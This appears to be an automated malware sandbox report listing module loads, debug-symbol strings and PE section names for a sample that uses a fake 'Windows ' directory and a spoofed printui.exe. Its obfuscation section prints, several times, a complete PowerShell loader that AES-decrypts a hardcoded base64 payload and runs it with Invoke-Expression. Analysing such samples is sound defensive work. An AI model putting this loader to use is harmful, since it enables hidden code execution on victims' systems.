    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: twext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: workfoldersshell.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: ntshrui.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cscapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: shacct.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: idstore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: samlib.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wtsapi32.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: acppage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: aepic.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wlidprov.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: provsvc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositorycore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: ninput.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: ninput.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dui70.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: duser.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: thumbcache.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dataexchange.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: d3d11.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dcomp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.ui.fileexplorer.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: cldapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: fltlib.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: uiribbon.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: xmllite.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: atlthunk.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: linkinfo.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryclient.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: ntshrui.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: cscapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: structuredquery.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: ehstorshell.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: cscui.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: networkexplorer.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: mrmcorer.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorycore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: appxdeploymentclient.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: bcp47mrm.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: mrmdeploy.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: appxdeploymentclient.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.ui.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windowmanagementapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: inputhost.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: provsvc.dllJump to behavior
    Source: C:\Windows\System32\xcopy.exeSection loaded: ulib.dll
    Source: C:\Windows\System32\xcopy.exeSection loaded: ifsutil.dll
    Source: C:\Windows\System32\xcopy.exeSection loaded: devobj.dll
    Source: C:\Windows\System32\xcopy.exeSection loaded: fsutilext.dll
    Source: C:\Windows\System32\xcopy.exeSection loaded: ntmarta.dll
    Source: C:\Windows\System32\xcopy.exeSection loaded: ulib.dll
    Source: C:\Windows\System32\xcopy.exeSection loaded: ifsutil.dll
    Source: C:\Windows\System32\xcopy.exeSection loaded: devobj.dll
    Source: C:\Windows\System32\xcopy.exeSection loaded: fsutilext.dll
    Source: C:\Windows\System32\xcopy.exeSection loaded: ntmarta.dll
    Source: C:\Windows \System32\printui.exeSection loaded: uxtheme.dll
    Source: C:\Windows \System32\printui.exeSection loaded: printui.dll
    Source: C:\Windows \System32\printui.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\System32\OpenWith.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
    Source: F.7zStatic file information: File size 77248657 > 1048576
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: console_zero.exe, 00000033.00000002.2225221333.00007FFA33147000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdbGG source: usvc.dat.31.dr
    Source: Binary string: vcruntime140d.amd64.pdb source: vcruntime140d.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: vcruntime140d.amd64.pdb,,, source: vcruntime140d.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: console_zero.exe, 00000033.00000002.2226266010.00007FFA5112F000.00000002.00000001.01000000.0000001A.sdmp, zlib1.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: svchost.exe, 0000002E.00000002.2378540668.00007FFA243AB000.00000002.00000001.01000000.0000001B.sdmp, libcrypto-3-x64.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdb source: usvc.dat.31.dr
    Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: svchost.exe, 0000002E.00000002.2389293768.00007FFA2CF18000.00000002.00000001.01000000.00000017.sdmp, libpq.dll.31.dr
    Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: svchost.exe, 0000002E.00000002.2389293768.00007FFA2CF18000.00000002.00000001.01000000.00000017.sdmp, libpq.dll.31.dr
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: console_zero.exe, 00000033.00000002.2226266010.00007FFA5112F000.00000002.00000001.01000000.0000001A.sdmp, zlib1.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: svchost.exe, 0000002E.00000002.2387227676.00007FFA2CEB0000.00000002.00000001.01000000.00000018.sdmp, libssl-3-x64.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: ucrtbased.pdb source: ucrtbased.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: PrintUI.pdb source: xcopy.exe, 00000019.00000002.1799318566.000001A4BEA1C000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000001B.00000000.1832292058.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe, 0000001F.00000002.2221772024.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe.25.dr
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: svchost.exe, 0000002E.00000002.2387227676.00007FFA2CEB0000.00000002.00000001.01000000.00000018.sdmp, libssl-3-x64.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: PrintUI.pdbGCTL source: xcopy.exe, 00000019.00000002.1799318566.000001A4BEA1C000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000001B.00000000.1832292058.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe, 0000001F.00000002.2221772024.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe.25.dr

    Data Obfuscation

    barindex
    Found suspicious powershell code related to unpacking or dynamic code loading
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB
    Suspicious command line found
    Source: C:\Windows \System32\printui.exeProcess created: "C:\Windows\System32\cmd.exe" /c powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
    Source: C:\Windows \System32\printui.exeProcess created: "C:\Windows\System32\cmd.exe" /c powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
    Suspicious powershell command line found
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3312B470 WSAStartup,WSACleanup,GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,GetSystemDirectoryW,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,QueryPerformanceFrequency,51_2_00007FFA3312B470
    Source: x249569.dat.16.drStatic PE information: section name: _RDATA
    Source: x249569.dat.16.drStatic PE information: section name: .fptable
    Source: x249569.dat.26.drStatic PE information: section name: _RDATA
    Source: x249569.dat.26.drStatic PE information: section name: .fptable
    Source: console_zero.exe.31.drStatic PE information: section name: .fptable
    Source: vcruntime140d.dll.31.drStatic PE information: section name: _RDATA
    Source: libiconv-2.dll.31.drStatic PE information: section name: .xdata
    Source: libiconv-2.dll.31.drStatic PE information: section name: /4
    Source: libiconv-2.dll.31.drStatic PE information: section name: /19
    Source: libiconv-2.dll.31.drStatic PE information: section name: /31
    Source: libiconv-2.dll.31.drStatic PE information: section name: /45
    Source: libiconv-2.dll.31.drStatic PE information: section name: /57
    Source: libiconv-2.dll.31.drStatic PE information: section name: /70
    Source: libiconv-2.dll.31.drStatic PE information: section name: /81
    Source: libiconv-2.dll.31.drStatic PE information: section name: /92
    Source: libintl-9.dll.31.drStatic PE information: section name: .xdata
    Source: libintl-9.dll.31.drStatic PE information: section name: /4
    Source: libintl-9.dll.31.drStatic PE information: section name: /19
    Source: libintl-9.dll.31.drStatic PE information: section name: /31
    Source: libintl-9.dll.31.drStatic PE information: section name: /45
    Source: libintl-9.dll.31.drStatic PE information: section name: /57
    Source: libintl-9.dll.31.drStatic PE information: section name: /70
    Source: libintl-9.dll.31.drStatic PE information: section name: /81
    Source: libintl-9.dll.31.drStatic PE information: section name: /92
    Source: libwinpthread-1.dll.31.drStatic PE information: section name: .xdata
    Source: x338625.dat.31.drStatic PE information: section name: .fptable
    Source: usvc.dat.31.drStatic PE information: section name: _RDATA
    Source: usvc.dat.31.drStatic PE information: section name: .fptable
